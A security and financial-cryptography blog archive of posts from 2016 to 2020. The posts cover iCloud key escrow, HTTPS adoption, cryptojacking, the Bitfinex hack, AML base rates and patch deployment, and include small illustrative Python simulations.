January 26, 2020

Bayesian Security Compromise

Watching an Internet argument (which I started) about Apple allegedly dropping iCloud encryption reminded me of how hard it is to get security & privacy right.

What had actually happened was that Apple had made it possible for you to back up securely to iCloud and leave a key there, so if you got locked out, Apple could help you get your access back. Usability to the fore!

But some were surprised at this - I know I was. So how do you get it your way? The details are complicated, run to several pages, and clearly most people will not follow the instructions, or get the outcome they want, without help.

Keeping access to your own data is *important*! Keeping others out of your data is also important. And these two are in collision - in tension, pulling against each other across the diagonal of the trade-off.

Strangely, it has a Bayesian feel to it - there is a strong link between the "false positives" and the "false negatives", such that if you dial one down, you actually dial the other up! Bayesian statistics tells you where on the compromise you sit, and whether you've blown out the model by being too tight on one particular axis.
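
To make that dial concrete, here's a minimal sketch (all numbers invented) of an account-recovery check whose scores for legitimate owners overlap those for attackers; slide the acceptance threshold and the lockouts trade off against the break-ins:

    import random
    random.seed(1)

    # invented score distributions: owners score high, attackers low, with overlap
    owners    = [random.gauss(0.7, 0.15) for _ in range(10_000)]
    attackers = [random.gauss(0.3, 0.15) for _ in range(10_000)]

    for threshold in (0.3, 0.5, 0.7):
        locked_out = sum(s < threshold for s in owners) / len(owners)        # false negatives
        let_in     = sum(s >= threshold for s in attackers) / len(attackers) # false positives
        print(f"threshold {threshold}: {locked_out:.1%} owners locked out, "
              f"{let_in:.1%} attackers admitted")

Raise the threshold and fewer attackers get in, but more owners are locked out of their own backups; lower it and the reverse. There is no setting that drives both to zero.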

When you get to a scale where your user base includes people of all persuasions and all security & privacy preferences, you may well be stuck in that compromise - you can save most of the people most of the time, so an awful lot depends on what most of your users are like.

(Note the discord with the rule: there is only one mode, and it is secure.)

Posted by iang at 04:40 AM | Comments (0)

November 23, 2019

HTTPS reaches 80% - mission accomplished after 14 years

A post on Matthew Green's blog highlights that the Snowden revelations helped the push for HTTPS everywhere.

Firefox reports a similar result, indicating a web-wide figure of around 80%.

(It should be noted that Google's decision to reward sites using HTTPS by prioritising them in search results probably helped more than anything, but before you jump for joy at this new-found love for security socialism, note that it isn't working too well in the fake news department.)

The significance of this is that back in around 2005 some of us first worked out that we had to move the entire web to HTTPS. The logic at the time was:

Why is this important? Why do we care that a small group of sites is still running SSL v2? Here's why - it feeds into phishing:

1. In order for browsers to talk to these sites, they still perform the SSL v2 Hello.
2. Which means they cannot talk the TLS hello.
3. Which means that servers like Apache cannot implement TLS features to operate multiple web sites securely through multiple certificates.
4. Which further means that the spread of TLS (a.k.a. SSL) is slowed down dramatically (only one protected site per IP number - schlock!), and
5. This finally means that anti-phishing efforts at the browser level haven't a leg to stand on when it comes to protecting 99% of the web.

Until *all* sites stop talking SSL v2, browsers will continue to talk SSL v2. Which means the anti-phishing features we have been building and promoting are somewhat held back because they don't so easily protect everything.

For the tl;dr: we can't protect the web while HTTP is possible. Having both HTTP and HTTPS as alternatives broke the rule - there is only one mode, and it is secure - and allowed attackers like phishers to just use HTTP and *pretend* it was secure.
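
For the record, the TLS feature pointed at in item 3 above became Server Name Indication, SNI: the client names the site in its TLS hello, so one IP number can serve many certificates. A minimal server-side sketch in Python - hostnames, port and certificate paths are all hypothetical:

    import socket, ssl

    # one certificate per site, all behind a single IP number
    contexts = {}
    for host in ("alpha.example", "bravo.example"):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        ctx.load_cert_chain(f"/etc/tls/{host}.pem")
        contexts[host] = ctx

    default_ctx = contexts["alpha.example"]

    def pick_cert(conn, server_name, _ctx):
        # the client named the site in its hello; swap in that site's cert
        if server_name in contexts:
            conn.context = contexts[server_name]

    default_ctx.sni_callback = pick_cert

    with socket.create_server(("0.0.0.0", 8443)) as srv:
        with default_ctx.wrap_socket(srv, server_side=True) as tls_srv:
            conn, addr = tls_srv.accept()   # handshake runs pick_cert

None of this is possible while a server must also answer the SSL v2 hello, which has no field for the server name.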

The significance of this for me is that, from that point in time until now, we can show that a typical turn around the OODA loop (observe, orient, decide, act) of Information Security Combat took about 14 years. Albeit in the Internet protocol world, but that happens to be a big part of it.

During that time, a new bogeyman turned up - the NSA listening to everything - but that's ok. Decent security models should cover multiple threats, and we don't so much care which threat gets us to a comfortable position.

Posted by iang at 12:27 PM | Comments (0)

March 09, 2019

PKI certs are a joke, edition 2943

From the annals of web research:

A thriving marketplace for SSL and TLS certificates...exists on a hidden part of the Internet, according to new research by Georgia State University's Evidence-Based Cybersecurity Research Group (EBCS) and the University of Surrey. ....

When these certificates are sold on the darknet, they are packaged with a wide range of crimeware that delivers machine identities to cybercriminals who use them to spoof websites, eavesdrop on encrypted traffic, perform attacks and steal sensitive data, among other activities.

This is a direct consequence of certificate manufacturing, which is a direct consequence of the decision by browser vendors to downgrade the UX for security from essential to invisible.

I don't disagree with that last part as a strategy because as I wrote a long time ago, education is worse than useless. But the consequence of certificate manufacturing follows directly because if the certs can't be seen, they can't be valuable. And if they're not valuable, we need the lowest cost pipeline.

And lowest cost means zero. Which means they are confetti, and Let's Encrypt has the right model. The unfortunate conclusion is that if certs are confetti we should not be selling them, we should be self-creating them. But the cartel got its death grip on the browser vendors, and so the unfortunate trade in pricey, worthless certs continues.

This is all water under the bridge. But it is an interesting security question: how long will it take for the wider industry to strip out the broken model and replace it entirely? I vaguely recall that HTTP/2 adopted certificates, and as that is the hot new thing of the future, we'll probably need another two decades. Chance missed; let's all go long on phishing.

"One very interesting aspect of this research was seeing TLS certificates packaged with wrap-around services—such as Web design services—to give attackers immediate access to high levels of online credibility and trust," he said. "It was surprising to discover how easy and inexpensive it is to acquire extended validation certificates, along with all the documentation needed to create very credible shell companies without any verification information."

Yup, and "surprisingly easy" extended validation for crooks is another consequence. Without a systemic approach to user security, it's doomed, and EV and other tricks are just fiddling while Rome and her citizens burn.

Posted by iang at 02:58 PM | Comments (0)

January 29, 2019

How does the theory of terrorism stack up against AML? Badly - finally a case in Kenya: Dusit

Finally, an actual financial system & terrorism case lands before the courts, relating to the Dusit attack. Is this a world first? I don't know because this conjunction is so rare, nobody's tracking it.

The essential gripe is that since 9/11 the financial world has slapped the terrorism label on its compliance process. Yet to no avail. The cases are very few, and so small that they fall between the Bayesian cracks. So misdirected, because terrorists have options, and they can adjust their approach to slip under the radar. Backfiring, because the terrorists are already outside norms and will do as much damage as needed, thus further harming the financial system.

And so hopeless because your true terrorist doesn't care about being caught afterwards - he's either dead or sacrificed.


Anyway, that's the theory - anti-terrorism applied to the financial system simply won't work. Let's see how the theory stacks up against the evidence.

A suspect linked to the Dusit terror attack received Sh9 million from South Africa in three months and sent it to Somalia, the Anti-Terror Police Unit have said. Twenty one people, including a GSU officer, were killed in the January 15 attack. The cash was received through M-Pesa.

So far so good. We have about $90,000 (100 Kenya shillings is 1 USD) sent through M-Pesa, a mobile money system in Kenya, allegedly related to the Dusit attack.

Hassan Abdi Nur has 52 M-Pesa agent accounts. Forty-seven were registered between October and December last year, each with a SIM card. He used different IDs to register the SIM cards.

So (1), the theory of terrorism predicts that the money will be moved safely, whatever the cost. We have a match. In order to move the money, 52 accounts were opened, at the cost of different IDs.

One curiosity here is the cost. In my long-running series on the Cost of Your Identity Theft we see (or I suggest) an average cost for an identity set of around $1000. That would amount to a cost of $52k for 50-odd sets. But this is high for a washed amount of $90k.

Either the terrorists don't care about the cost, or the cost of dodgy ID is lower in Kenya, or the alleged middleman amortised the cost over other deals. Interesting for further investigation, but not germane to this case.

Then (2), the theory of Bayesian statistics and the "base rate fallacy" predicts that no terrorists will ever be caught before the fact on the basis of AML/KYC controls.

Clearly this is a match - the evidence is being compiled from after-the-fact forensics. Now, in this the Kenyan authorities are to be applauded for coming out and actually revealing what's going on. In the western world, there is too much of a tendency to hide behind "national secrets" and thus render outside scrutiny - the democratic imperative - an impossibility. One up for the Kenyans; let's keep this investigation transparent and before the courts.
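
The base rate fallacy deserves a worked example. With invented but generous numbers - a screen that catches 99% of terror-finance transactions and wrongly flags only 1% of innocent ones, against a base rate of one terror transaction in a million:

    base_rate      = 1e-6   # fraction of transactions that are terror finance (assumed)
    sensitivity    = 0.99   # P(flag | terror) (assumed)
    false_positive = 0.01   # P(flag | innocent) (assumed)

    p_flag = sensitivity * base_rate + false_positive * (1 - base_rate)
    p_terror_given_flag = sensitivity * base_rate / p_flag
    print(f"P(terror | flagged) = {p_terror_given_flag:.6f}")   # ~0.0001

Roughly ten thousand false alarms per true hit. No compliance officer acts usefully on those odds, which is why the catch only ever comes after the fact.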

Next (3). The theory predicts that follow the money is a useless tool.

Ambitham was in constant communication with slain lead attacker Ali Salim Gichunge, who died during the attack, and his spouse Violent Kemunto Omwoyo.

[Inspector] Githaiga yesterday said Ambitham’s phone led to his arrest on Tuesday after detectives established his communication with the Gichunges.

The police are following the social graph and arresting anyone involved. Having traced the phones, they then investigated the M-Pesa evidence, which provided many additional and interesting confirmatory facts.

Which is what they should do. But it was the contact information that cracked this case, not the financial flows. The contact information has always been available to them. And, where there is a credible case of terrorism as is in this case, the financial information has never been withheld. Again, the theory matches the evidence: follow the money is useless before the event, only confirmatory after the event.

Finally (4), the theory of unforeseen consequences says that the damage done by unintelligent responses will haunt the future of anti-terrorism efforts.

These are the agents that received the money, which was later withdrawn at the Diamond Trust Bank, Eastleigh branch, before it was wired to Somalia. ... The manager of the bank where Nur was withdrawing the money, Sophia Mbogo, was arrested for failing to report Nur’s suspicious transactions. Nur is said to have made huge withdrawals in short intervals, which Mbogo ought to have reported to relevant authorities, but there is no indication she did so.

Without wishing to compromise the investigation - this looks inept. Eastleigh is the Somali district of Nairobi. It's a bustling centre of trade. In some respects the Somalis are better traders than the Kenyans, and a lot of trade is done. And a lot of that is in cash, because the Kenyan banking system is ... not responsive. Lots of legitimate cash would move in and out of that bank branch.

Given the alleged fact that the money man had 52 M-Pesa accounts, he was certainly aware enough to run under the radar of the branch. Thresholds and actions by banks are no secret, especially to those motivated by terrorism to commit any crime to find out - bribery, extortion and kidnapping are all options.

Maybe there is evidence that the branch or the manager is "in" on the deal. Or maybe there is not, and the Kenyan police have just confirmed the theory that FATF anti-terrorism will do more damage. They've sent a message to all branches: drown your customers in pointless compliance, and do not cooperate with the police.

The Kenyan police had better get a clear and undeniable conviction against the branch manager, or they are going to rue the day. The next terrorist attack will surely be harder.

Posted by iang at 01:33 AM | Comments (0)

January 11, 2019

Gresham's Law thesis is back - Malware bid to oust honest miners in Monero

Seven years after we called out the cancer that is criminal activity in Bitcoin-like cryptocurrencies, here comes a report suggesting that 4.3% of Monero mining is siphoned off by criminals.

A First Look at the Crypto-Mining Malware
Ecosystem: A Decade of Unrestricted Wealth

Sergio Pastrana
Universidad Carlos III de Madrid*
spastran@inf.uc3m.es
Guillermo Suarez-Tangil
King’s College London
guillermo.suarez-tangil@kcl.ac.uk

Abstract—Illicit crypto-mining leverages resources stolen from victims to mine cryptocurrencies on behalf of criminals. While recent works have analyzed one side of this threat, i.e.: web-browser cryptojacking, only white papers and commercial reports have partially covered binary-based crypto-mining malware. In this paper, we conduct the largest measurement of crypto-mining malware to date, analyzing approximately 4.4 million malware samples (1 million malicious miners), over a period of twelve years from 2007 to 2018. Our analysis pipeline applies both static and dynamic analysis to extract information from the samples, such as wallet identifiers and mining pools. Together with OSINT data, this information is used to group samples into campaigns. We then analyze publicly-available payments sent to the wallets from mining pools as a reward for mining, and estimate profits for the different campaigns. Our profit analysis reveals campaigns with multimillion earnings, associating over 4.3% of Monero with illicit mining. We analyze the infrastructure related with the different campaigns, showing that a high proportion of this ecosystem is supported by underground economies such as Pay-Per-Install services. We also uncover novel techniques that allow criminals to run successful campaigns.

This is not the first time we've seen confirmation of the basic thesis in the paper Bitcoin & Gresham's Law - the economic inevitability of Collapse. Anecdotal accounts suggest that in the period of late 2011 and into 2012 there was a lot of criminal mining.

Our thesis was that criminal mining begets more criminal mining, and eventually pushes out honest business of all forms, from mining to trade.

Testing the model: Mining is owned by Botnets

Let us examine the various points along an axis from honest to stolen mining: 0% botnet mining to 100% saturation. Firstly, at 0% of botnet penetration, the market operates as described above, profitably and honestly. Everyone is happy.

But at 0%, there exists an opportunity for near-free money. Following this opportunity, one operator enters the market by turning his botnet to mining. Let us assume that the operator is a smart and careful crook, and therefore sets his mining limit at some non-damaging minimum value such as 1% of total mining opportunity. At this trivial level of penetration, the botnet operator makes money safely and happily, and the rest of the Bitcoin economy will likely not notice.

However, we can also predict with confidence that the market for botnets is competitive. As there is free entry into mining, an effective cartel of botnets is unlikely. Hence, another operator can and will enter the market. If a penetration level of 1% is non-damaging, 2% is only slightly less so, and probably nearly as profitable for both of them as for one alone.

And, this remains the case for the third botnet, the fourth and more, because entry into the mining business is free, and there is no effective limit on dishonesty. Indeed, botnets are increasingly based on standard off-the-shelf software, so what is available to one operator is likely visible and available to them all.
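
A toy model of that free entry (my numbers, not the paper's) shows where it ends up - operators keep turning botnets to mining while a 1% slice of the reward beats their near-zero cost of stolen electricity:

    BLOCK_REWARD = 100.0     # coin issued per period (assumed)
    COST_FLOOR   = 0.05      # a botnet's cost per period, on stolen power (assumed)
    honest_power = 0.99      # honest share of hashpower at the start

    botnets = 0
    while True:
        total = honest_power + botnets * 0.01          # each botnet adds a 1% slice
        if BLOCK_REWARD * 0.01 / total < COST_FLOOR:   # revenue per botnet too thin
            break
        botnets += 1

    share = botnets * 0.01 / (honest_power + botnets * 0.01)
    print(f"{botnets} botnets enter; criminal share = {share:.0%}")

Entry only stops when revenue per botnet hits the cost floor, by which point the criminal share is around 95%. The individually "careful" 1% slices saturate the market anyway.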

What stopped it from happening in 2012 and onwards? The consensus is that ASICs killed the botnets. Serious mining firms moved to large custom rigs of ASICs, and as these were so much more powerful than any home computer, they effectively knocked the criminal botnets out of the market. The new paper acknowledges this:

... due to the proliferation of ASIC mining, which uses dedicated hardware, mining Bitcoin with desktop computers is no longer profitable, and thus criminals’ attention has shifted to other cryptocurrencies.

Why is botnet mining back with Monero? Presumably because Monero uses an ASIC-resistant algorithm that is best served by GPUs. Monero is also a heavyweight privacy coin, which works nicely for honest people with privacy problems, but works just as well to hide criminal gains.

Posted by iang at 05:01 PM | Comments (11)

February 26, 2018

Epidemic of cryptojacking can be traced to escaped NSA superweapon

Boingboing writes on the connection between two themes often grumbled about in this blog: that Bitcoin muffed the incentives and encourages destructive and toxic behaviour, and that the NSA is the agency that, as a matter of policy, weakens our Internet.


The epidemic of cryptojacking malware isn't merely an outgrowth of the incentive created by the cryptocurrency bubble -- that's just the motive, and the all-important means and opportunity were provided by the same leaked NSA superweapon that powered last year's Wannacry ransomware epidemic.

It all started when the Shadow Brokers dumped a collection of NSA cyberweapons that the NSA had fashioned from unreported bugs in commonly used software, including versions of Windows. The NSA discovered these bugs and then hoarded them, rather than warning the public and/or the manufacturers about them, in order to develop weapons that turned these bugs into attacks that could be used against the NSA's enemies.

This is only safe if neither rival states nor criminals ever independently rediscover the same bugs and use them to attack your country (they do, all the time), and if your stash of cyberweapons never leaks (oops).

Discovering the subtle bugs the NSA weaponized is sophisticated work that can only be performed by a small elite of researchers; but using these bugs is something that real dum-dums can do, as was evidenced by the hamfisted Wannacry epidemic.

Enter the cryptocurrency bubble: turning malware into money has always been tough. Ransomware criminals have to set up whole call-centers full of tech-support people who help their victims buy the cryptocurrency used to pay the ransom. But cryptojacking cuts out the middleman, stealing your computer to directly generate cash for the malware author. As long as cryptocurrencies continue to inflate, this is a great racket.

Wannamine is a cryptojacker that uses Eternalblue, the same NSA exploit as Wannacry. It's been around since last October, and it's on the rise, extracting Monero from victims' computers.

What's more, it's a cryptojacker written by a dum-dum, and it is so incontinent that it slows down critical computers to the point of uselessness, shutting down important IT infrastructure.

WannaMine doesn’t resort to EternalBlue on its first try, though. First, WannaMine uses a tool called Mimikatz to pull logins and passwords from a computer’s memory. If that fails, Wannamine will use EternalBlue to break in. If this computer is part of a local network, like at a company office, it will use these stolen credentials to infect other computers on the network.

The use of Mimikatz in addition to EternalBlue is important “because it means a fully patched system could still be infected with WannaMine,” York said. Even if your computer is protected against EternalBlue, then, WannaMine can still steal your login passwords with Mimikatz in order to spread.

Cryptocurrency Mining Malware That Uses an NSA Exploit Is On the Rise [Daniel Oberhaus/Motherboard]

Posted by iang at 05:43 PM | Comments (4)

February 20, 2018

Tesla’s cloud was used by hackers to mine cryptocurrency

Just because I get the photo op, here's The Verge on Tesla's operations being cryptojacked.

Tesla’s cloud account was hacked and used to mine cryptocurrency, according to a security research firm. Hackers gained access to the electric car company’s Amazon cloud account, where they were able to view “sensitive data” such as vehicle telemetry.

...

According to RedLock, using Tesla’s cloud account to mine cryptocurrency is more valuable than any data stored within. The cybersecurity firm said in a report released Monday that it estimates 58 percent of organizations that use public cloud services, such as AWS, Microsoft Azure, or Google Cloud, have publicly exposed “at least one cloud storage service.” Eight percent have had cryptojacking incidents.

“The recent rise of cryptocurrencies is making it far more lucrative for cybercriminals to steal organizations’ compute power rather than their data,” RedLock CTO Gaurav Kumar told Gizmodo. “In particular, organizations’ public cloud environments are ideal targets due to the lack of effective cloud threat defense programs. In the past few months alone, we have uncovered a number of cryptojacking incidents including the one affecting Tesla.”

Posted by iang at 03:51 PM | Comments (4)

January 04, 2018

Hackers selling access to Aadhaar

TRIBUNE INVESTIGATION — SECURITY BREACH
Rs 500, 10 minutes, and you have access to billion Aadhaar details
Group tapping UIDAI data may have sold access to 1 lakh service providers

Rachna Khaira
Tribune News Service
Jalandhar, January 3

It was only last November that the UIDAI asserted that “Aadhaar data is fully safe and secure and there has been no data leak or breach at UIDAI.” Today, The Tribune “purchased” a service being offered by anonymous sellers over WhatsApp that provided unrestricted access to details for any of the more than 1 billion Aadhaar numbers created in India thus far.

It took just Rs 500, paid through Paytm, and 10 minutes in which an “agent” of the group running the racket created a “gateway” for this correspondent and gave a login ID and password. Lo and behold, you could enter any Aadhaar number in the portal, and instantly get all particulars that an individual may have submitted to the UIDAI (Unique Identification Authority of India), including name, address, postal code (PIN), photo, phone number and email.

What is more, The Tribune team paid another Rs 300, for which the agent provided “software” that could facilitate the printing of the Aadhaar card after entering the Aadhaar number of any individual.

When contacted, UIDAI officials in Chandigarh expressed shock over the full data being accessed, and admitted it seemed to be a major national security breach. They immediately took up the matter with the UIDAI technical consultants in Bangaluru.

Sanjay Jindal, Additional Director-General, UIDAI Regional Centre, Chandigarh, accepting that this was a lapse, told The Tribune: “Except the Director-General and I, no third person in Punjab should have a login access to our official portal. Anyone else having access is illegal, and is a major national security breach.”

...

Posted by iang at 02:32 PM | Comments (0)

June 16, 2017

Identifying as an artist - using artistic tools to generate your photo for your ID

Copied without comment:

Artist says he used a computer-generated photo for his official ID card

A French artist says he fooled the government by using a computer-generated photo for his national ID card.

Raphael Fabre posted on his website and Facebook what he says are the results of his computer modeling skills on an official French national ID card that he applied for back in April.


Le 7 avril 2017, j’ai fait une demande de carte d’identité à la mairie du 18e. Tous les papiers demandés pour la carte étaient légaux et authentiques, la demande a été acceptée et j’ai aujourd’hui ma nouvelle carte d’identité française.

La photo que j’ai soumise pour cette demande est un modèle 3D réalisé sur ordinateur, à l’aide de plusieurs logiciels différents et des techniques utilisées pour les effets spéciaux au cinéma et dans l’industrie du jeu vidéo. C’est une image numérique, où le corps est absent, le résultat de procédés artificiels.

L’image correspond aux demandes officielles de la carte : elle est ressemblante, elle est récente, et répond à tous les critères de cadrage, lumière, fond et contrastes à observer.

Le document validant mon identité le plus officiellement présente donc aujourd’hui une image de moi qui est pratiquement virtuelle, une version de jeu vidéo, de fiction.
Le portrait, la planche photomaton et le récépissé de demande ont été montrés à la Galerie R-2 pour l'Exposition Agora

On April 7, 2017, I made a request for an identity card at the city hall of the 18th arrondissement. All the papers requested for the card were legal and authentic, the request was accepted, and I now have my new French identity card.

The photo I submitted for this request is a 3D model made on a computer, using several different pieces of software and techniques used for special effects in cinema and in the video game industry. It is a digital image in which the body is absent, the result of artificial processes.

The image meets the official requirements for the card: it is a good likeness, it is recent, and it satisfies all the criteria for framing, light, background and contrast.

So the document that most officially validates my identity today presents an image of me that is practically virtual, a video game version, a fiction.

The portrait, the photo-booth strip and the application receipt were shown at the R-2 Gallery for the Exposition Agora.

The image is 100 percent artificial, he says, made with special-effects software usually used for films and video games. Even the top of his body and clothes are computer-generated, he wrote (in French) on his website.

But it worked, he says. He followed guidelines for photos and made sure the framing, lighting, and size were up to government standards for an ID. And voila: He now has what he says is a real ID card with a CGI picture of himself.

"Absolutely everything is retouched, modified, and idealized"
He told Mashable France that the project was spurred by his interest in discerning what's artificial and real in the digital age. "What interests me is the relationship that one has to the body and the image ... absolutely everything is retouched, modified, and idealized. How do we see the body and identity today?" he said.

In an email, he said that the French government isn't aware yet of his project that just went up on Facebook earlier this week, but "it is bound to happen."

Before he received the ID, the CGI portrait and his application were on display at an Agora exhibit in Paris through the beginning of May.

Now, if the ID is real, it looks like his art was impressive enough to fool the French government.

Posted by iang at 05:21 AM | Comments (16)

February 19, 2017

N Reasons why Searching Electronic Devices makes Everyone Unsafe.

The current practice of searching electronic devices makes everyone less safe. Here are several reasons.

1. People's devices will often include their login credentials for online banking or <shudder> digital cash accounts such as Bitcoin. The presence of all this juicy bank account and digital cash information is going to corrupt the people doing the searching, turning them to seizure.

In the age when security services might detain you until you decrypt your hard drive, or border guards might threaten to deny you entry until you reveal your phone’s PIN, it is only a matter of time before the state authorities discover what Bitcoin hardware wallets are (maybe they did already). When they do, what can stop them from forcing you to unlock and reveal your wallet?

I'm not saying may, I'm saying will. And before you say "oh, but our staff are honest and resistant to corruption," let me say this: you're probably wrong and you just don't know it. Most countries, including the ones currently experimenting with searching techniques, have corruption in them; the only thing that varies is the degree and location.

As we know from the war on drugs, corruption aligns pretty much positively with the value at risk. As border guards start delving into travellers' electronic devices in the constitution-free zone of the border, they have opened up the travellers' material and disposable wealth. This isn't going to end well.

2. In response to corruption, and/or to perceived corruption from this new ability of authorities to see and seize funds, users and travellers will move away from the safer electronic funding systems to less safe alternates. In the extreme, cash - but also consider this a clear signal to use Bitcoin, folks. People used to dealing with online methods of storing value will explore alternates. No matter what we think about banks, they are mostly safer than the alternates, at least in the OECD, so this will reduce overall safety.

3. Anyone who actually intends to harm your homeland already knows what you are up to. So, they'll just avoid it. The easy way is to not carry any electronic devices across the border. They'll pick up new devices as they're driving off from the airport.

4. Boom - the entire technique of searching electronic devices is now spent on generating false positives, which are hits on the electronic devices of innocent travellers who want to travel, not to hurt. Which brings harm to everyone except the bad guys, who are left free because there is nothing to search.

5. This is the slight flaw in my argument that everyone will be less safe: the terrorists will be safer, because they won't be being searched. But, as they intend to harm, their level of safety is very low in the long run.

6. Which will lead to border guards accusing travellers without electronics of being suspicious jihadists. Which will lead real jihadists to start carrying burner phones pre-loaded with 'legends' - personas created for the purpose of tricking border guards.

And, yes, before you ask: it's easier for bad folk to create a convincing legend than it is to spot a legend in the crush of the airport queue.

7. The security industry is already - after only 2 weeks of this crazy policy - talking about how to hide personal data from a device search.

Some of these techniques of hiding the true worth will work. OK, that's the individual's right.

8. Note how you've made the security industry your enemy. I'm not sure how this works to the benefit of anyone, but it is going to make it harder for you to get quality advice in the future.

9. Some of the techniques won't work, leading to discovery, and a presumption that a traveller has something to hide. Therefore /guilty by privacy/ will be branded on innocent people, resulting in more cost to everyone.

10. All of the techniques will lead to an arms race as border guards have to develop newer and better understanding of each dark space in each electronic device, and we the people will have to hunt around for easy dark spaces. When we could all be doing something useful.

11. All of the techniques, working or not, will lower usability and therefore result in less overall security for the user. This is Kerckhoffs' 6th principle of security: if the device is too hard to use, it won't be used at all, achieving zero security.

The notion that searching electronic devices could make anyone safer is based on the likelihood of a freak accident. That is, the chance that some idiotterrorjihadist doesn't follow the instructions from on high, and actually carries a device onto a plane with some real intel on it.

This is a forgettable chance. Someone so dumb as to fly on a plane carrying the plans to blow up the airport on his phone is unlikely to get out of the bath without slipping and breaking his neck. This is not a suitable operative for the intricacies of some evil plot. Terrorists will know this; they're evil, but they are not stupid. They will not let anyone stupid enough to carry infringing material onto the plane anywhere near the plot.

There is zero upside in this tactic. The homeland security people who have been searching electronic devices have summarily destroyed a valuable targeted technique. They have increased harm and damages to everyone except the people they think they are chasing - which of course increases the harm to everyone.

Posted by iang at 01:35 PM | Comments (1)

October 23, 2016

Bitfinex - Wolves and a sheep voting on what's for dinner

When Bitcoin first started up, although I have to say I admired the solution in an academic sense, I had two critiques. One is that PoW is not really a sustainable approach. Yes, I buy the argument that you have to pay for security, and it worked so it must be right. But that's only true in a narrow sense - there's also an ecosystem to think about.

Which brings us to the second critique. The Bitcoin community has typically focussed on the security of the chain, and less so on the security of the individual. There aren't easy tools to protect the user's value. There is an excess of focus on technologically elegant inventions such as multisig, HD wallets, cold storage, 51% attacks and the like, but there isn't much or enough focus on how the user survives in that desperate world.

Instead, there's a lot of blaming the victim - saying they should have done X or Y, or used our favourite toy, or this exchange not that one. Blaming the victim isn't security, it's cannibalism.


Unfortunately, you don't get out of this for free. If the Bitcoin community doesn't move to protect the user, two things will happen. Firstly, Bitcoin will earn a dirty reputation, so the community won't be able to move to the mainstream. E.g., all these people talking about banks using Bitcoin - fantasy. Moms and pops will be and remain safer with money in the bank, and that's a scary thought if you actually read the news.

Secondly, and worse, the system remains vulnerable to collapse. Let's say someone hacks Mt.Gox and makes a lot of money. They've now got a lot of money to invest in the next hack and the next and the next. And then we get to the present day:

Message to the individual responsible for the Bitfinex security incident of August 2, 2016

We would like to have the opportunity to securely communicate with you. It might be possible to reach a mutually agreeable arrangement in exchange for an enormous bug bounty (payable through a more privacy-centric and anonymous way).


So it turns out a hacker took a big lump of Bitfinex's funds. However, the hacker didn't take it all. Joseph VaughnPerling tells me:

"The bitfinex hack took just about exactly what bitfinex had in cold storage as business profit capital. Bitfinex could have immediately made all customers whole, but then would have left insufficient working capital. The hack was executed to do the maximal damage without hurting the ecosystem by putting bitfinex out of business. They were sure to still be around to be hacked again later.

It is like a good farmer, you don't cut down the tree to get the apples."

A carefully calculated amount, coincidentally about the same as Bitfinex's working capital! This is annoyingly smart of the hacker - the parasite doesn't want to kill the host. The hacker just wants enough to keep the company in business until the next mafia-style protection invoice is due.

So how does the company respond? By realising that it is owned. Pwned, the cool kids say. But owned. Which means a negotiation is due, and better to convert the hacker into a more responsible shareholder or partner than to just hand over the company funds, because there has to be some left over to keep the business running. The hacker is incentivised to back off and take just a little, and the company is incentivised to roll over and let the bigger dog be boss dog.

Everyone wins - in terms of game theory and economics, this is a stable solution. Although customers would have trouble describing this as a win for them, we're looking at it from an ecosystem approach - parasite versus host.

But, that stability only survives if there is precisely one hacker. What happens if there are two hackers? What happens when two hackers stare at the victim and each other?

Well, it's pretty easy to see that two attackers won't agree to divide the spoils. If the first one in takes an amount calculated to keep the host alive, and then the next hacker does the same, the host will die. Even if two hackers could convert themselves into one cartel and split the profits, a third or fourth or Nth hacker breaks the cartel.
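
A toy simulation makes the point (all numbers mine, purely illustrative): the host's capital grows 10% a period, and each hacker independently skims the 10% that a lone parasite could take sustainably:

    def run(n_hackers, periods=20):
        capital = 100.0
        for _ in range(periods):
            capital *= 1.10                      # business growth (assumed)
            capital *= (1 - 0.10) ** n_hackers   # no cartel: every hacker takes a full cut
            if capital < 10.0:                   # working-capital floor: host dies
                return "host dies"
        return f"host survives with {capital:.0f}"

    for n in (1, 2, 3):
        print(f"{n} hacker(s): {run(n)}")

One hacker and the host limps along indefinitely; two or more and the combined skim kills it.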

The hackers don't even have to vote on this - like the old joke about democracy, when there are 2 wolves and 1 sheep, they eat the sheep immediately. The talk about voting is just the funny part for human consumption. Pardon the pun.

The only stability that exists in this market is if there is between zero and one attacker. So, barring the emergence of some new consensus protocol to turn all the individual attackers into one global mafia guild - a theme frequently celebrated in the James Bond movies - this market cannot survive.


To survive in the long run, the Bitcoin community has to do better than the banks - much better. If the Bitcoin community wants a future, it has to change course. It has to stop obsessing about the chain's security and start obsessing about the user's security.

The mantra should be, nobody loses money. If you want users, that's where you have to set the bar - nobody loses money. On the other hand, if you want to build an ecosystem of gamblers, speculators and hackers, by all means, obsess about consensus algorithms, multisig and cold storage.


ps: I first made this argument of ecosystem instability in "Bitcoin & Gresham's Law - the economic inevitability of Collapse," co-authored with Philipp Güring.

Posted by iang at 12:35 PM | Comments (0)

March 27, 2016

OODA loop of breach patching - Adobe

My measurement of the OODA loop length for the renegotiation bug in SSL was a convenient device to show where we are failing. The OODA loop is famous in military circles for the notion that if your attacker circles faster than you, he wins. Recently, Tudor Dumitras wrote:

To understand security threats, and our ability to defend against them, an important question is "Can we patch vulnerabilities faster than attackers can exploit them?" (to quote Bruce Schneier). When asking this question, people usually think about creating patches for known vulnerabilities before exploits can be developed, or discovering vulnerabilities before they can be targeted in zero-day attacks. However, another race may have an even bigger impact on security: once a patch is released, it must also be deployed on all the hosts running the vulnerable software before the vulnerability is exploited in the wild. ....

For example, CVE-2011-0611 affected both the Adobe Flash Player and Adobe Reader (Reader includes a library for playing .swf objects embedded in a PDF). Because updates for the two products were distributed using different channels, the vulnerable host population decreased at different rates, as illustrated in the figure on the left. For Reader patching started 9 days after disclosure (after patch for CVE-2011-0611 was bundled with another patch in a new Reader release), and the update reached 50% of the vulnerable hosts after 152 days. For Flash patching started earlier, 3 days after disclosure, but the patching rate soon dropped (a second patching wave, suggested by the inflection in the curve after 43 days, eventually subsided as well). Perhaps for this reason, CVE-2011-0611 was frequently targeted by exploits in 2011, using both the .swf and PDF vectors.
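
As a back-of-envelope, the quoted Reader numbers pin down a simple decay model - my fit, not the paper's: patching starts at day 9 and halves the vulnerable population every 143 days thereafter:

    def vulnerable_fraction(day, start_day=9, half_life=152 - 9):
        if day < start_day:
            return 1.0                # nobody can patch before the patch exists
        return 0.5 ** ((day - start_day) / half_life)

    for day in (0, 30, 152, 365):
        print(f"day {day:3d}: {vulnerable_fraction(day):.0%} still vulnerable")

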